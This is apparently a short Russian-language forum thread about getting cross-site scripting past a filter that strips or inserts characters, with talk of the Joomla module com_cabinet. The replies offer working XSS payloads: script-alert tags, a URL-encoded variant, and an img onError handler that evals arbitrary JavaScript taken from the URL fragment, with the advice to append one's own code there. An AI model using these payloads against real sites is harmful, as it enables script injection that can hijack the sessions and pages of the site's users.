Фильтр режет и ставит символы/пробелы. <sc ript>a lert()</sc ript> Теперь вот это: <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav * ascript:a lert('XSS');"> Быть может у кого-то есть опыт.
+1 <script>alert(/XSS/)</script> %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2f%58%53%53%2f%29%3c%2f%73%63%72%69%70%74%3e
<img src="#$@#*$&" onError="eval(decodeURIComponent(location.href).split('#')[1])" /> + Добавь к адресной строке: #здесь твой яваскрипт код
Для точного ответа нужен сайт. Модуль Joomla - com_cabinet, сейчас проверил на нескольких сайтах, XSS там не наблюдалось.